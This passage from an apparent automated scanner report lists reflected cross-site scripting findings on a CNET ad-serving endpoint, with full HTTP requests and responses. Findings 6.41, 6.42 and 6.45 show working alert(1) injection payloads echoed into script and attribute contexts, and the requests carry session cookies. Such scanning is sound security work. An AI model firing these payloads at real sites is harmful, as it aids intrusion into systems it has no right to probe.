/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A4a259<a>912498d9b9d&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&
...[SNIP]...

6.39. http://mads.cnet.com/mac-ad [NODE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 189d8<a>f55d6ee52e0 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939189d8<a>f55d6ee52e0&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:28 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:36:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939189d8<a>f55d6ee52e0&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BE
...[SNIP]...

6.40. http://mads.cnet.com/mac-ad [OS parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the OS request parameter is copied into the HTML document as plain text between tags. The payload 2e8ff<a>c8d172ed6c1 was submitted in the OS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%202e8ff<a>c8d172ed6c1&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:22 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:35:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%202e8ff<a>c8d172ed6c1&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATU
...[SNIP]...

6.41. http://mads.cnet.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 65376*/alert(1)//b31b0eb50c was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=65376*/alert(1)//b31b0eb50c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:25 GMT
Server: Apache/2.2
Content-Length: 665
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:31:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=65376*/alert(1)//b31b0eb50c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAA
...[SNIP]...

6.42. http://mads.cnet.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53302'%3balert(1)//3364702832c was submitted in the PAGESTATE parameter. This input was echoed as 53302';alert(1)//3364702832c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=53302'%3balert(1)//3364702832c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:22 GMT
Server: Apache/2.2
Content-Length: 669
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:31:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=53302'%3balert(1)//3364702832c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE
...[SNIP]...
jttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) */;window.CBSI_PAGESTATE='53302';alert(1)//3364702832c';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw2.cnet.com::1544677696 2011.05.04.01.31.22 *//* MAC T 0.1.1.1 */

6.43. http://mads.cnet.com/mac-ad [PTYPE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload fba4a<a>4b18f579c72 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300fba4a<a>4b18f579c72&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:41 GMT
Server: Apache/2.2
Content-Length: 621
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:32:41 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300fba4a<a>4b18f579c72&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&co
...[SNIP]...

6.44. http://mads.cnet.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 5b774<a>074a9b55b75 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1095b774<a>074a9b55b75&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:35 GMT
Server: Apache/2.2
Content-Length: 617
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:31:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1095b774<a>074a9b55b75&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=
...[SNIP]...

6.45. http://mads.cnet.com/mac-ad [SITE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d576a"><script>alert(1)</script>9bc12335b1 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=5&SITE=3d576a"><script>alert(1)</script>9bc12335b1&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:40 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:30:40 GMT
Content-Length: 2132

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13060&amp;sg=513174&amp;o=&amp;h=cn&amp;p=2&amp;b=5&amp;l=en_US&amp;site=3d576a"><script>alert(1)</script>9bc12335b1&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e21:4DC0A4E3789E4&amp;orh=admeld.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&am
...[SNIP]...

6.46. http://mads.cnet.com/mac-ad [_RGROUP parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload 9aac9--><a>a4ec2a29964 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=130609aac9--><a>a4ec2a29964 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:21 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:31:21 GMT
Content-Length: 1687

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<!-- NO AD TEXT: _QUERY_STRING="CELT=ifc&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=130609aac9--><a>a4ec2a29964" _REQ_NUM="0" -->
...[SNIP]...

6.47. http://mads.cnet.com/mac-ad [cookiesOn parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload e9cb9<a>a068ebd640a was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1e9cb9<a>a068ebd640a&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:33 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:37:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1e9cb9<a>a068ebd640a&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID
...[SNIP]...

6.48. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e8c85<a>b09e8ba8b09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1&e8c85<a>b09e8ba8b09=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
